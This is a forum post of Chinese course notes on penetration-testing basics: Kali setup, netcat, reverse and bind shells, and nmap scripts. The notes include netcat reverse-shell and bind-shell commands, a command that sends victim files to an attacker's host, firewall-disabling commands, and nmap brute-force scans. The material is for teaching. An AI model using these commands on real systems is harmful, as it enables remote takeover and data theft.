本帖最后由 luosinian 于 2025-3-15 01:36 编辑
1. 课程内容概要(简要概括本次课程的主要内容,不需要太详细,但要能快速回忆起本节课的知识点)
主要知识点1:渗透专用系统简介
主要知识点2:kali优化
主要知识点3:netcat简介与使用
主要知识点4:nmap简介与使用
2.重点知识与细节(针对本节课的核心内容进行详细记录,包含公式、代码、重要原理等)
kali优化
更改镜像源: /etc/apt/sources.list
vi /etc/apt/sources.list
kali切换root⽤户: sudo su
更新软件数据库: sudo apt-get update
更新软件: sudo apt-get upgrade
设置语⾔包: sudo dpkg-reconfigure locales
修改缩放⽐率: hidp
netcat简介与使用
⽤途:⽹络⼯具 渗透⼯程师 ⼊侵到服务器
-h帮助信息 -isecs 延时的间隔 -l监听模式,用于入站连接 -L连接关闭后,仍然继续监听 -n指定数字的IP地址,不能域名服务器 -ofile 记录16进制的传输 -pport 本地端口号
-r随机本地及远程端口 -saddr 本地源地址 -t使用TELNET交互方式 -uUDP模式 -v详细输出--用两个-v可得到更详细的内容 -wsecs timeout的时间 -z将输入输出关掉--用于扫描时
nc的基本使用方法 1、实现连接通讯 服务端 监听端口 Nc -lnvp 端口 客户端 连接端口 nc ip 端口 代表监听本地的端口输出结果不加域名
获取shell
1.正向shell(正向shell,必须先绑定监听后,对端再执⾏命令才可以连接上) 让受害者开启 shell 之后,我们去主动连接这个 shell
Linux控制Windows
Windows绑定CMD到本地5566端⼝
nc -e cmd -lvp 5566
Linux主动连接⽬标5566
nc ip地址 5566
Windows 控制 Linux
Linux绑定SH到本地5566端⼝
nc -e /bin/sh -lvp 5566
Windows主动连接⽬标5566
nc ip地址 5566
Linux 控制 Linux
Linux受害者绑定SH到本地5566端⼝
nc -e /bin/sh -lvp 5566
Linux攻击者主动连接⽬标5566
nc ip地址 5566
Windows 控制Windows
Windows受害者绑定CMD到本地5566端⼝
nc -e cmd -lvp 5566
Windows攻击者主动连接⽬标5566
nc ip地址 5566
2.反向shell 正向:受害者开启监听之后,我们(攻击者)主动去找受害者
反向:我们(攻击者)开启监听,受害者主动来找我们区分正向和反向的最⼤区别就在于,是谁开启的监听
反弹shell⽣成: https://forum.ywhack.com/reverse-shell/
nc反弹:
必须攻击者先监听后,受害者才可以执⾏命令进⾏连接
控制Linux
攻击者等待5566连接
nc -lvvp 5566
受害者Linux绑定CMD到⽬标5566端⼝
nc -e /bin/sh ip地址 5566
控制Windows
攻击者等待5566连接
nc -lvvp 5566
受害者Windows绑定CMD到⽬标5566端⼝
nc -e cmd ip地址 5566
service firewalld status 查看防⽕墙状态
sudo systemctl stop firewalld 关闭防⽕墙
sudo systemctl start firewalld 开启防⽕墙
sudo systemctl disable firewalld 永久关闭
传输⽂件内容
受害者将⾃⼰本地的1.txt发送到攻击者的1.txt⾥⾯(有什么⽤?)包含敏感信息的⽂件我们直接发送回来
接收者⽂件存放名字可以随便写
攻击者(服务端;接收): nc -lvp 端⼝号 > 1.txt
受害者(客户端;发送): nc ip地址 端⼝号 < 1.txt
攻击者的⽂件名可以随便起,受害者这边必须得有这个⽂件才能发送正向:攻击者主动去连接受害者
受害者: nc -e /bin/sh -lvp 5566(linux)
nc -e cmd -lvp 5566(windows)攻击者: nc 受害者ip地址 端⼝
正向:攻击者主动去连接受害者
受害者: nc -e /bin/sh -lvp 5566(linux)
nc -e cmd -lvp 5566(windows)攻击者: nc 受害者ip地址 端⼝
反向:受害者主动来连接攻击者
攻击者: nc -lvvp 5566
受害者: nc -e /bin/sh 攻击者ip地址 端⼝nc -e cmd 攻击者ip地址 端⼝
反弹shell⽣成器
⽬标可能有各种不同的环境,可能是开发环境差异,也可能是操作系统差异,我们只要能够根据不同的差异去选择不同的反弹 shell 命令去操作就可以了。
https://forum.ywhack.com/reverse-shell/
端⼝&利⽤⼯具
端⼝讲解1-65535 端⼝范围端⼝占⽤
端⼝对应服务
nmap
https://zhuanlan.zhihu.com/p/585377081
nmap脚本扩展: https://wooyun.js.org/drops/nmap%E8%84%9A%E6%9C%AC%E4%BD%BF%E7%94%A8%E 6%80%BB%E7%BB%93.html
镜像源
中科⼤:
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
阿⾥云:
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
清华⼤学:
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
作业
一、对自己的kali系统进行优化
vi /etc/network/interfaces 配置静态IP
vi /etc/passwd 修改账号
/home/路径下 mv kali user 修改kali用户目录为新用户的家目录
passwd 新用户 修改密码
vi /etc/sudoers 给新用户添加sudo
vi /etc/apt/sources.list 把国内源添加进去
更新软件数据库: sudo apt-get update
更新软件: sudo apt-get upgrade
vi /etc/ssh/ssh_config 配置ssh
systemctl enable ssh 开机启动ssh
二、实操nc正向shell,nc反弹shell,python反弹shell,bash反弹shell截图
三、使用nmap中的脚本扫描自己的局域网主机
nmap --script=auth 192.168.0.* 负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令
nmap --script=brute 192.168.0.* 提供暴力破解的方式 可对数据库,smb,snmp等进行简单密码的暴力猜解
nmap --script=default 192.168.0.* 或者 nmap -sC 192.168.0.* 默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击
nmap --script=vuln 192.168.0.* 检查是否存在常见漏洞
nmap -n -p445 --script=broadcast 192.168.0.12 在局域网内探查更多服务开启状况
nmap --script external 192.168.0.12 利用第三方的数据库或资源,例如进行whois解析
由于扫描太慢,不进行截图了
四、结合自己的理解,说明什么是端口,什么是服务,它俩之间的联系是什么
端口分为两种:物理端口和逻辑端口
物理端口:硬件外设端口
逻辑端口:软件端口,范围0-65535,分为TCP和UDP两种
服务:在操作系统上的应用程序或进程,提供特定的功能
关系:端口用于标识和区分不同的服务,服务通过端口与客户端进行通信
|